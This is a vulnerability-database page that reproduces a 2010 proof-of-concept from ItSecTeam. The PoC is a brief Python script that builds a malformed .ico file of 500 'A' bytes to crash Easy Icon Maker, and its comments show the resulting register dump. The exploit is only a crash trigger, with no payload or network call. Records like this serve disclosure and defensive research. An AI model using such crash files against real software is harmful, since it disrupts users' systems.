Lucene search
K

Easy Icon Maker .ico File Reading Crash

🗓️ 30 Mar 2010 00:00:00Reported by ItsecteamType 
zdt
 zdt
🔗 0day.today👁 28 Views

Easy Icon Maker .ico File Reading Crash vulnerability in Python scrip

Code
=======================================
Easy Icon Maker .ico File Reading Crash
=======================================

#! /usr/bin/python
#
# Easy Icon Maker .ico File Reading Crash
# Homepage: www.icon-maker.com
# #############################################################################
# Credit : ItSecTeam
# mail : [email protected]
# Web:  WwW.ITSecTeam.com
# Forum: WwW.forum.itsecteam.com
# Special Tanks : PLATE - [email protected] - B3hz4d - Cdef3nder 
# #############################################################################
# EAX 30303030 ECX 00000000 EDX 00000000 EBX 00000000 ESP 0012F328 EBP 0012F3E4
# ESI 30303028 EDI 00330000 EIP 7C90FF91 ntdll.7C90FF91

try:
	file=open("poc.ico",'w')
	Buff = "\x41" *500
	file.write( Buff )
	file.close()
	print   ("[+] File created successfully: poc.ico" )
except:
	print "[-] Error cant write file to system\n""""



#  0day.today [2018-02-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Mar 2010 00:00Current
7High risk
Vulners AI Score7
28